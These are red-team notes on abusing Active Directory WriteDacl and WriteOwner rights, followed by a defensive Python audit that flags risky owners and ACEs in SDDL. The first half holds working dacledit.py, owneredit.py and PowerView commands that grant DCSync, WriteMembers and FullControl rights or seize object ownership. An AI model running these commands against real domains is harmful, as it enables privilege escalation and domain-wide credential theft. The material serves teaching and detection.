# Granting Rights and Ownership

Permissions such as `WriteDacl` and `Ownership` play a crucial role in controlling access to objects and keeping them secure. The `WriteDacl` access right allows an account to modify the `DACL` of a target object. `Ownership`, on the other hand, denotes the state of holding administrative control over an object: the owner can always rewrite its DACL. Understanding these access rights matters because whoever holds them can rewrite the `DACL` and thereby decide which further abuses the object is exposed to.

If we possess an account with privileges to modify a target object's DACL, we can use that account to edit the target's DACL and make it vulnerable to other attacks.

#### WriteDacl

Once we find an account with `WriteDacl` or `Ownership` over another object, we can modify that object's DACL to, for example, grant DCSync rights on the domain object, which covers the entire domain:

```bash
dacledit.py -principal otter -target-dn dc=domain,dc=com -dc-ip 10.10.10.10 domain.com/otter:'SomethingSecure123!' -action write -rights DCSync
```

```powershell
Import-Module .\PowerView.ps1
Add-DomainObjectAcl -TargetIdentity $(Get-DomainSID) -PrincipalIdentity otter -Rights DCSync -Verbose
```

Another option is to grant ourselves rights over a group (without `-action write`, `dacledit.py` only reads the existing DACL):

```bash
dacledit.py -principal otter -target "Vulnerable Group" -dc-ip 10.10.10.10 domain.com/otter:'SomethingSecure123!' -action write -rights WriteMembers
```

Now we can add ourselves or another user to a group like we did in the [AddMembers](/red-teaming/notes/dacl-abuse/addmembers.md) section.

#### WriteOwner

This access right allows us to change the `owner` of the target object, i.e. the `OwnerSid` field of the object's `security descriptor`.

```cypher
MATCH p=((n:User)-[r:WriteOwner]->(m)) RETURN p
```

With this kind of right we can perform a [GPO attack](/red-teaming/notes/dacl-abuse/gpo-attacks.md). Specifically, we can abuse `WriteOwner` by using `owneredit`:

```bash
owneredit.py -action write -new-owner otter -target targetUser -dc-ip 10.10.10.10 domain.com/otter:'SomethingSecure123!'
```

Usually this step is followed by changing the DACL of the object we now own to grant ourselves something like `FullControl`:

```bash
dacledit.py -principal otter -target targetUser -action write -rights FullControl -dc-ip 10.10.10.10 domain.com/otter:'SomethingSecure123!'
```

From Windows we can do the same with PowerView:

```powershell
Set-DomainObjectOwner -Identity targetUser -OwnerIdentity otter -Verbose
Add-DomainObjectAcl -TargetIdentity targetUser -PrincipalIdentity otter -Rights All -Verbose
```
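From the defender's side, both sections above come down to a few conditions in the object's security descriptor: an unexpected owner, or an ACE granting `GenericAll`, `WriteDacl`, `WriteOwner`, or the pair of replication extended rights that make up DCSync. The following audit, added here as an example and not part of the original notes or of impacket/PowerView, parses a descriptor in SDDL string form and reports exactly those conditions. It is in Python because `dacledit.py` and `owneredit.py` are Python tools. The SDDL strings, the SID ending in `-1105` (standing in for the `otter` account), and the baseline of expected principals are constructed assumptions; the two replication-right GUIDs and the SDDL access codes are the real Windows values.

```python
"""Audit an AD security descriptor (SDDL form) for owner and ACE conditions
that hand out DACL/ownership control or DCSync replication rights.
Added example; descriptors and SIDs below are constructed, not from a real domain."""
from __future__ import annotations
import re
from dataclasses import dataclass

# Control-access-right GUIDs a DC checks before answering replication requests.
DS_REPL_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPL_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
DCSYNC_RIGHTS = frozenset({DS_REPL_GET_CHANGES, DS_REPL_GET_CHANGES_ALL})

# Two-letter SDDL access codes and the ACCESS_MASK bits they encode.
RIGHT_BITS = {
    "GA": 0x10000000, "GR": 0x80000000, "GW": 0x40000000, "GX": 0x20000000,
    "RC": 0x00020000, "SD": 0x00010000, "WD": 0x00040000, "WO": 0x00080000,
    "CC": 0x1, "DC": 0x2, "LC": 0x4, "SW": 0x8, "RP": 0x10, "WP": 0x20,
    "DT": 0x40, "LO": 0x80, "CR": 0x100,
}
FULL_CONTROL_MASK = 0x000F01FF  # explicit bit pattern AD tools write for "FullControl"

# Assumed baseline: principals for which these rights are normal on a domain or
# user object (Domain Admins, Enterprise Admins, Builtin Admins, SYSTEM,
# Domain Controllers, Enterprise Domain Controllers). Adjust per environment.
EXPECTED_PRINCIPALS = frozenset({"DA", "EA", "BA", "SY", "DD", "ED"})


@dataclass(frozen=True)
class Ace:
    ace_type: str     # "A" allow, "OA" object-specific allow, "D"/"OD" deny
    rights: int       # decoded ACCESS_MASK
    object_guid: str  # extended right or property GUID for OA aces, else ""
    trustee: str      # SID string or two-letter SDDL alias


def parse_rights(text: str) -> int:
    """Decode the rights field: a hex mask or concatenated two-letter codes."""
    if text.lower().startswith("0x"):
        return int(text, 16)
    mask = 0
    for i in range(0, len(text), 2):
        code = text[i:i + 2]
        if code not in RIGHT_BITS:
            raise ValueError(f"unknown SDDL access code {code!r}")
        mask |= RIGHT_BITS[code]
    return mask


def parse_sddl(sddl: str) -> tuple[str, list[Ace]]:
    """Return (owner, DACL aces). The group (G:) and SACL (S:) parts are ignored."""
    parts = dict(re.findall(r"([OGDS]):((?:(?![OGDS]:).)*)", sddl))
    aces = []
    for body in re.findall(r"\(([^)]*)\)", parts.get("D", "")):
        fields = body.split(";")  # type;flags;rights;object_guid;inherit_guid;sid
        if len(fields) < 6:
            raise ValueError(f"malformed ACE {body!r}")
        aces.append(Ace(fields[0], parse_rights(fields[2]), fields[3].lower(), fields[5]))
    return parts.get("O", ""), aces


def audit(sddl: str, expected=EXPECTED_PRINCIPALS) -> list[tuple[str, str]]:
    """Return (principal, issue) pairs for unexpected principals that own the object
    or hold rights letting them rewrite its security descriptor or replicate it."""
    owner, aces = parse_sddl(sddl)
    findings = []
    if owner not in expected:
        findings.append((owner, "Owner"))
    repl: dict[str, set[str]] = {}  # trustee -> replication GUIDs granted
    for ace in aces:
        if ace.ace_type not in ("A", "OA") or ace.trustee in expected:
            continue  # deny ACEs grant nothing; baseline admins are expected
        full = bool(ace.rights & RIGHT_BITS["GA"]) or \
            (ace.rights & FULL_CONTROL_MASK) == FULL_CONTROL_MASK
        if full:
            findings.append((ace.trustee, "GenericAll"))
            continue  # full control subsumes everything checked below
        if ace.rights & RIGHT_BITS["WD"]:
            findings.append((ace.trustee, "WriteDacl"))
        if ace.rights & RIGHT_BITS["WO"]:
            findings.append((ace.trustee, "WriteOwner"))
        if ace.rights & RIGHT_BITS["CR"]:
            if ace.ace_type == "A" or ace.object_guid == "":
                findings.append((ace.trustee, "AllExtendedRights"))  # CR without GUID
            elif ace.object_guid in DCSYNC_RIGHTS:
                repl.setdefault(ace.trustee, set()).add(ace.object_guid)
    for trustee, guids in repl.items():
        if DCSYNC_RIGHTS <= guids:  # both replication rights => DCSync possible
            findings.append((trustee, "DCSync"))
    return findings


OTTER = "S-1-5-21-1111111111-2222222222-3333333333-1105"  # constructed SID

# Constructed, simplified domain-object descriptor before and after ACEs of the
# kind `dacledit.py ... -rights DCSync` adds for the attacker-held account.
DOMAIN_BEFORE = ("O:DAG:DAD:PAI(A;;RPLCLORC;;;AU)"
                 f"(OA;;CR;{DS_REPL_GET_CHANGES};;ED)"
                 f"(OA;;CR;{DS_REPL_GET_CHANGES};;DD)"
                 f"(OA;;CR;{DS_REPL_GET_CHANGES_ALL};;DD)"
                 "(A;;RPWPCRCCDCLCLORCWOWDSW;;;DA)")
DOMAIN_AFTER = DOMAIN_BEFORE + (f"(OA;;CR;{DS_REPL_GET_CHANGES};;{OTTER})"
                                f"(OA;;CR;{DS_REPL_GET_CHANGES_ALL};;{OTTER})")

# Constructed user-object descriptor: before, the account only holds WriteOwner
# (the owneredit precondition); after, it owns the object and has FullControl
# in the hex form a DACL editor writes.
USER_BEFORE = f"O:DAG:DUD:AI(A;;RPLCLORC;;;AU)(A;;WO;;;{OTTER})"
USER_AFTER = f"O:{OTTER}G:DUD:AI(A;;RPLCLORC;;;AU)(A;;0x000f01ff;;;{OTTER})"

if __name__ == "__main__":
    for name, sddl in [("domain before", DOMAIN_BEFORE), ("domain after", DOMAIN_AFTER),
                       ("user before", USER_BEFORE), ("user after", USER_AFTER)]:
        print(f"{name}: {audit(sddl) or 'no findings'}")
```

The same parser accepts the SDDL that Windows records in the Attribute Value field of Event ID 5136 when `nTSecurityDescriptor` is modified, so the audit can be run against those events to catch the `dacledit`/`owneredit` changes as they happen, as well as against live objects (for example the `.Sddl` property of `Get-Acl "AD:\<dn>"`). The baseline set is the important tuning knob: a trustee that legitimately needs `WriteMembers` on one group should be added there rather than silenced globally.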

